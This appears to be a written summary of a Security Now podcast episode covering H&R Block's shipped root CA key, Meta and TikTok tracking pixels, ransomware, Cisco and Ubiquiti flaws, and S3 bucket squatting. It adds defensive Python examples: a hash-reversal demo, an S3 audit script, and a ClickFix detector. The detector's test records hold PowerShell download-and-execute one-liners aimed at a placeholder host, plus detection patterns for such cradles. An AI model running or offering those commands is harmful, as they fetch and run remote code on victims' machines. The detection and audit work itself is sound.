Security Now Episode 1071: "Bucketsquatting" – Meta and TikTok’s Tracking Pixels
Podcast: Security Now (TWiT)
Hosts: Steve Gibson & Micah Sargent (filling in for Leo Laporte)
Date: March 25, 2026
Episode Overview
This episode covers a wide array of recent cybersecurity topics, centering on the fascinating and troubling concept of bucket squatting in Amazon S3 cloud storage—a vulnerability that exposes an alarming supply-chain risk. Other major topics include:
- The serious flaw in H&R Block’s tax software and root certificate handling
- How TikTok and Meta use “tracking pixels” for deep user and business surveillance
- A real-world ransomware incident affecting Intoxalock breathalyzer infrastructure
- Major new vulnerabilities in Cisco and Ubiquiti products (CVSS 10.0)
- Firefox’s new built-in VPN and privacy developments
- Security advice and feedback from listeners
The show dives deep into technical explanations, the implications for organizations and individuals, and practical advice for improving security posture.
Main Topics and Timeline
1. H&R Block’s Dangerous Root Certificate Mishap
[09:48] – [43:52]
Summary:
A security researcher discovered that H&R Block's Business 2025 tax software installs its own root CA certificate into the user's trusted root store, ships the matching private key unprotected inside one of its DLLs, and leaves the root in place even after the software is uninstalled. Because the private key is effectively public and the root carries no constraints, anyone can mint TLS server, code-signing or client certificates that every affected machine will trust until the root expires in 2049, enabling TLS interception (MITM), trusted malicious code and user impersonation.
Key Insights:
- Installing a long-lived, unconstrained root CA is a grave security mistake, especially when the private key is shipped with the software.
- "Anyone anywhere in the world can generate their own TLS web certificates or code signing certificates [...] because there's no constraint on the use of this that will be trusted without question by any previous user of H&R Block's tax preparation software." – Steve Gibson [23:05]
- Example exploit: a proof-of-concept site shows your browser will trust a “backdoor” certificate if affected.
Why did they do this?
- Steve reasons the only plausible intention is for local web-server operation (web UIs) via localhost, but even then, it should have been done differently and much more securely.
- H&R Block’s response: “Similar findings have been identified through internal security assessments.” Then they closed the report as “out of scope.” [39:40]
- Proper solution: if a locally trusted CA is genuinely needed, generate it per installation, never ship or persist the private key (keep it only in memory for as long as it is needed), constrain the CA to localhost with name constraints and a short lifetime, and remove it on uninstall.
Memorable Quotes:
- "Doing that is the height of hubris and irresponsibility." – Steve Gibson [18:29]
- “Please always audit your trusted root CA store. You never know what cruft something has left behind.” – Steve Gibson [16:25]
- "There can be no doubt that the use of their tax preparation software leaves an uninvited, unwanted, unconstrained root certificate with a 23 year lifetime..." [41:13]
2. Ransomware Shuts Down Intoxalock Breathalyzer Infrastructure
[58:10] – [65:55]
Summary:
Intoxalock, a company providing court-mandated in-car breathalyzers, suffered a significant ransomware attack. Their calibration system went offline for ten days, leaving many drivers unable to use their vehicles when the mandatory recalibration window expired.
Key Insights:
- Outage impacts “real life” as well as compliance with court orders, causing severe disruption.
- Sensitive data exfiltration is also likely: “That’s not the sort of data anyone would wish to have floating around the Internet…I would argue it makes a Social Security number look tame by comparison.” – Steve Gibson [62:32]
Memorable Moment:
- Goosebumps moment as Micah realizes the blackmail/extortion potential in exposing lists of court-mandated breathalyzer users. [63:04]
3. Firefox 149 Launches Free, Built-in VPN
[65:55] – [70:33]
Summary:
Firefox 149 (released March 24th) ships a free built-in VPN with a 50 GB/month allowance for users in selected countries. It hides the user's IP address from the sites they visit, which blocks IP-based tracking and sidesteps location-based content restrictions.
Key Insights:
- Mozilla’s move may be a response to declining market share (down to 4.2% desktop), and legislative pushback against anonymous/VPN usage for bypassing restrictions is brewing.
4. Tracking Pixels: The Dark Reality of Web Surveillance by TikTok & Meta
[73:14] – [90:02]
Summary:
JSCrambler researchers reveal that modern tracking pixels from TikTok and Meta go far beyond advertising attribution:
- They exfiltrate emails, phone numbers, addresses, checkout actions, cart contents, even payment data—often before or despite users’ consent choices.
- The identifiers are sent as hashes (typically SHA-256 of a normalized email address or phone number), but a hash of a low-entropy value is trivially reversible by anyone holding a candidate list, so hashing here is matching, not anonymization.
- “It’s total intrusion for Meta's benefit…They do it simply because they can.” – Steve Gibson [81:53]
Key Insights:
- Data captured includes full names, addresses, parts of credit card numbers – sometimes in cleartext.
- “Calling it a ‘pixel’ makes it cute, but it’s really a spying suite.” – Steve Gibson [88:19]
- Merchants may be unwitting accomplices due to integrations (e.g., Shopify); much of this exceeds what’s documented or intended.
- These “pixels” put merchants at risk for GDPR/CCPA violations and outright competitive espionage.
Notable Quotes:
- “Merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels…” [85:18]
- “Both TikTok and Meta’s pixel code can begin transmitting data before the website’s consent management system has time to block it.” [86:41]
- “The pixels are not passive measurement tools. They are instead active data collection systems…” [88:19]
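Why hashed identifiers are a matching key rather than anonymization, as an added example (not code from the episode or from the Jscrambler report): the pixel normalizes an email or phone number exactly so that the same person hashes identically on every site, and anyone holding a candidate list (their own user base, a marketing database, a breach dump) reverses the hash with one dictionary lookup. The customer records, the field names `em`/`ph` and the normalization rules are constructed for illustration.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional

# Constructed sample customer list (made-up addresses and numbers): the kind of
# data a pixel reads from a checkout form, normalizes and hashes before sending.
CUSTOMERS = [
    ("Alice.Example@Example.com", "(202) 555-0143"),
    ("bob@example.org", "+1 202 555 0199"),
    ("  carol@example.net ", "202-555-0177"),
]


def normalize_email(email: str) -> str:
    # Trim and lowercase, so the same person hashes identically on every site
    # that embeds the pixel (this is what makes the hash a cross-site identifier).
    return email.strip().lower()


def normalize_phone(phone: str, default_country_code: str = "1") -> str:
    # Digits only; treat a 10-digit number as domestic and prepend the country code.
    digits = re.sub(r"\D", "", phone)
    if len(digits) == 10:
        digits = default_country_code + digits
    return digits


def hash_identifier(value: str) -> str:
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


def pixel_payload(email: str, phone: str) -> Dict[str, str]:
    """What leaves the browser: only hashes, which look anonymous but are not."""
    return {
        "em": hash_identifier(normalize_email(email)),
        "ph": hash_identifier(normalize_phone(phone)),
    }


def build_reverse_table(customers: Iterable[tuple]) -> Dict[str, str]:
    """Precompute hash -> identity once for every candidate; each reversal is then O(1)."""
    table: Dict[str, str] = {}
    for email, phone in customers:
        e, p = normalize_email(email), normalize_phone(phone)
        table[hash_identifier(e)] = e
        table[hash_identifier(p)] = p
    return table


def reverse_hash(digest: str, table: Dict[str, str]) -> Optional[str]:
    return table.get(digest)


if __name__ == "__main__":
    table = build_reverse_table(CUSTOMERS)
    # Same person as the first record, typed differently at checkout.
    observed = pixel_payload("ALICE.EXAMPLE@example.com", "202.555.0143")
    for field, digest in observed.items():
        print(field, digest[:16] + "...", "->", reverse_hash(digest, table))
```

The defence for a merchant is not a different hash function; any deterministic hash of a small input space is reversible this way. The only real control is not sending the identifier at all.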
5. Russia’s Messaging Ban Strangles Business
[90:02] – [91:40]
Summary:
Russian private sector pleads for the government to reinstate Telegram, WhatsApp, and other messaging apps, as bans disrupt business communications with foreign partners. Russia’s goals of “national security” clash with operational reality.
6. Crypto Phishing & the Perils of Wallet “Connectivity”
[91:40] – [93:29]
Summary:
GitHub developers are targeted by phishing through fake Open Claw token bounties. Victims are asked to connect their wallets to malicious sites, leading to instant theft.
Advice:
- Never connect your main wallet to untrusted services; use a separate, low-balance wallet for experiments.
- “Anyone who considers themselves savvy enough to be a developer would have a difficult time extracting much sympathy from me…” – Steve Gibson [93:29]
7. Cisco & Ubiquiti: New Critical Vulnerabilities (CVSS 10.0)
[93:29] – [116:17]
Summary: Two consecutive new “Critical 10.0” vulnerabilities:
- Cisco “Secure Firewall Management Center” allows unauthenticated remote code execution as root (CVE-2026-20131); exploited by Interlock ransomware for more than 5 weeks before disclosure.
- Ubiquiti Unifi products suffer a severe path traversal bug—patches urgently required.
Amazon Threat Intelligence Investigation
Amazon's threat intelligence team found Interlock ransomware exploiting the Cisco zero-day for weeks before disclosure and recovered the group's full attack toolkit, which the attackers had exposed through their own misconfiguration, a rare win for defenders.
Key Insights:
- “Defense in depth” is essential. Reliance on patch cycles alone is not enough.
- “Anytime any management portal is exposed to the global Internet…the security of the organization now rests on that single point which could fail.” – Steve Gibson [110:40]
- Limiting access by IP/geography (least privilege) is a must—“It is a privilege if someone in China has the opportunity to guess your password. Why have you given them that?” – Steve Gibson [115:13]
8. Listener Feedback and Security Culture
[116:17] – [128:27]
Varied observations from the audience:
- Analog skills (clocks, cursive) and coding: will they too become an “arcane art” in the age of AI?
- Social engineering “click-fix” attacks: emails directing users to open a Windows Run prompt and paste PowerShell (malicious) code [120:34]
- Cloud code-signing raises the risk of credential compromise vs. locally managed HSMs.
- Craftsmanship in coding: analogy to hand-making fishing lures—some value in slow, quality, hands-on work.
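Detection logic for the "click-fix" pattern mentioned in the feedback segment, as an added example (not code from the episode): the lure has the victim press Win+R and paste a PowerShell one-liner, so the resulting process is a shell whose parent is explorer.exe and whose command line carries a download cradle, a remote URL or a base64 `-EncodedCommand` payload. The triage below runs over constructed process-creation records (paths, URLs and payloads are made up); a real deployment would feed it Sysmon Event ID 1 or Security 4688 data.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """Minimal view of a process-creation record (Sysmon Event ID 1 / Security 4688)."""
    parent_image: str
    image: str
    command_line: str


# Indicators evaluated over the command line plus any decoded -EncodedCommand payload.
INDICATORS = {
    "download cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|downloadfile)\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "profile/policy bypass": re.compile(
        r"-(?:nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", re.I),
    "remote URL": re.compile(r"https?://\S+", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
STRONG = {"download cradle", "remote URL", "encoded command"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A command typed into the Win+R Run dialog (the ClickFix lure) is a child of explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """-EncodedCommand carries base64 of UTF-16LE text; decode it so indicators can see it."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(ev: ProcessEvent) -> List[str]:
    text = ev.command_line
    hits: List[str] = []
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        hits.append("encoded command")
        text += " " + decoded
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
    return hits


def classify(ev: ProcessEvent) -> Tuple[str, List[str]]:
    """benign: no strong indicator; review: strong indicator from a normal parent;
    clickfix-suspect: strong indicator from a Run-dialog parent."""
    hits = indicators(ev)
    if basename(ev.image) not in SHELLS or not (STRONG & set(hits)):
        return "benign", hits
    if basename(ev.parent_image) in RUN_DIALOG_PARENTS:
        return "clickfix-suspect", hits
    return "review", hits


# Constructed sample records (not real telemetry); URLs use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "iex (irm 'https://example.invalid/a')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,                    # scheduled task
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Backup\nightly.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,                            # pasted into Win+R
                 'powershell -w hidden -nop -c "iex (irm https://example.invalid/verify.txt)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell -enc " + ENCODED_PAYLOAD),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,                        # admin at a console
                 'powershell -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        label, hits = classify(ev)
        print(f"{label:17} {basename(ev.parent_image):13} {ev.command_line[:60]}  {hits}")
```

The parent-process condition is what separates this from a generic "suspicious PowerShell" rule: the same cradle launched by a scheduled task or an administrator's console is worth a look, but one launched from explorer.exe on a workstation is the lure's signature.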
9. Bucket Squatting: The Cloud’s Forgotten Supply Chain Nightmare
[131:21] – [163:03]
Key Segment:
- Watchtower Labs (Feb 2025) documented registration of 153 abandoned Amazon S3 bucket names previously used by software, governments, and businesses.
- Over 8 million requests for updates, binaries, VM images, and config files streamed in over two months—including from US military, NASA, banks, labs, and Fortune 500s.
- S3 bucket names live in a single global namespace, and once a bucket is deleted its name can be claimed by any AWS account. Every automated updater, build script and appliance that still reaches for the old URL will download whatever the new owner chooses to serve, which makes this a silent supply-chain compromise waiting to happen. “Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious...” – Watchtower Labs (quoted at [137:43])
Steve’s Analysis:
- This is not a “bug” but a design flaw—Amazon’s flat global namespace and recycling policy are fundamentally unsafe for this usage.
- Solution: Bucket names should never be recycled. New “account regional namespaces” (announced March 2026) add per-account unique suffixes, preventing future squatting—but do not fix legacy buckets.
- “Your security needs security.”
- “When users are given a choice, they’ll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else.” – Steve Gibson [152:07]
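The check a practitioner wants after this segment, and the one the practical takeaway for developers and admins below calls for, as an added example (not code from the episode or from Watchtower Labs): scan your own installers, updater manifests, CI configs and provisioning scripts for S3 bucket references, then ask S3 whether each referenced name still exists and whether it is in your inventory. An unauthenticated HEAD on the path-style endpoint answers 404 for a name nobody owns (anyone can register it), and 200, 301 or 403 for a bucket that exists. The config snippet, bucket names and canned responses are constructed so the example runs offline; pass `head=live_head` to query S3 for real.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Set

# An S3 bucket name: 3-63 chars of lowercase letters, digits, dots and hyphens.
BUCKET = r"([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])"
ENDPOINT = r"s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com"
REFERENCE_PATTERNS = [
    re.compile(r"s3://" + BUCKET + r"(?![a-z0-9.-])"),                        # s3://bucket/key
    re.compile(r"https?://" + BUCKET + r"\." + ENDPOINT),                      # bucket.s3[.region].amazonaws.com
    re.compile(r"https?://" + ENDPOINT + r"/" + BUCKET + r"(?![a-z0-9.-])"),   # s3[.region].amazonaws.com/bucket
]


def find_bucket_references(text: str) -> List[str]:
    """Every distinct bucket name referenced in text, in order of first appearance."""
    found: List[str] = []
    for pattern in REFERENCE_PATTERNS:
        for m in pattern.finditer(text):
            if m.group(1) not in found:
                found.append(m.group(1))
    return found


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Keep 301s visible: the global path-style endpoint answers with a 301 for
    # buckets in other regions, which still proves the bucket exists.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_head(bucket: str) -> Optional[int]:
    """Unauthenticated HEAD via the path-style endpoint (works for dotted names too)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(f"https://s3.amazonaws.com/{bucket}/", method="HEAD")
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except urllib.error.URLError:
        return None


UNCLAIMED = "UNCLAIMED: name is free, anyone can register it and serve your clients"
FOREIGN = "exists but not in your inventory: confirm who owns it"
OWNED = "owned by you"
UNKNOWN = "could not verify (network/DNS error)"


def classify(bucket: str, status: Optional[int], owned: Set[str]) -> str:
    if bucket in owned:
        return OWNED
    if status == 404:
        return UNCLAIMED
    if status in (200, 301, 403):
        return FOREIGN
    return UNKNOWN


def audit(text: str, owned: Set[str],
          head: Callable[[str], Optional[int]] = live_head) -> Dict[str, str]:
    """owned: bucket names from your own accounts (e.g. `aws s3api list-buckets` output)."""
    report: Dict[str, str] = {}
    for bucket in find_bucket_references(text):
        status = None if bucket in owned else head(bucket)   # no round-trip for known buckets
        report[bucket] = classify(bucket, status, owned)
    return report


# Constructed snippets of an updater manifest, CI job and provisioning script (not from any real product).
SAMPLE_CONFIG = """
UPDATE_URL=https://acme-release-artifacts.s3.amazonaws.com/agent/latest.json
LEGACY_INSTALLER=https://s3.us-east-1.amazonaws.com/acme-old-installer-cdn/setup.exe
aws s3 cp s3://partner-vm-images/ubuntu-base.qcow2 /var/lib/images/
"""
OWNED_BUCKETS = {"acme-release-artifacts"}
# Constructed answers standing in for live HEAD responses so the example runs offline.
FAKE_RESPONSES = {"acme-old-installer-cdn": 404, "partner-vm-images": 301}

if __name__ == "__main__":
    for bucket, verdict in audit(SAMPLE_CONFIG, OWNED_BUCKETS, head=FAKE_RESPONSES.get).items():
        print(f"{bucket:28} {verdict}")
```

A 404 is the urgent case: a name you still reference that nobody owns should be re-registered by you today, before someone else does. A 403 or 301 on a name outside your inventory is not reassuring either; it only says that some account owns it, and that account may already be serving your clients.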
Notable Quotes & Moments
- “Your security needs security.” (Steve Gibson) [116:17]
- “It's never safe to depend entirely upon any single security control.” (Amazon’s threat team, quoted in episode) [110:40]
- “That is far more terrifying than I thought it was going to be based on the name...” (Micah Sargent, on bucket squatting) [163:03]
- “Calling it a pixel makes it cute, but it’s really a spying suite.” (Steve Gibson, on Meta/TikTok pixels) [88:19]
- “There can be no doubt the use of their tax preparation software leaves an uninvited, unwanted, unconstrained root certificate with a 23 year lifetime.” (Steve Gibson, on H&R Block issue) [41:13]
Practical Takeaways
- Audit your root CA list—apps may silently add dangerous trust anchors.
- Never connect your main crypto wallet to unknown web services.
- Patch high-profile, Internet-facing devices immediately—and add “defense in depth” (network filtering, least privilege, MFA, etc.).
- For developers/admins: inventory every bucket URL your installers, updaters, CI pipelines and appliances fetch from, confirm each bucket is still owned by an account you control, and never delete a bucket whose name is baked into shipped software; a released name is free for anyone to register.
- Reject uncritical trust in large platforms (Meta/TikTok)—read what pixels/scripts you embed actually do.
- Even “fully patched” doesn’t mean “immune”—always layer your defenses.
Overall Tone
The episode is characteristically technical, clear-eyed, and sometimes incredulous—equal parts “what were they thinking?” and practical advice. Steve and Micah’s chemistry brings levity and clarity to often-absurd real-world security missteps.
Essential Timestamps
- H&R Block CA debacle: [09:48] – [43:52]
- Intoxalock ransomware: [58:10]
- Firefox VPN: [65:55]
- Meta/TikTok tracking pixels: [73:14]
- Bucket squatting: [131:21] – [163:03]
Conclusion
A jam-packed episode not only illuminating major current vulnerabilities and privacy abuses, but also providing a masterclass in what to do—and not do—to secure infrastructure and protect user trust. The “bucket squatting” example is a vivid reminder that security is as much about good, scalable architectural decisions as patching bugs; that legacy design can have decades-long consequences; and that attackers (and well-meaning researchers) are always peering through every crack that gets left open.
Security really does need security.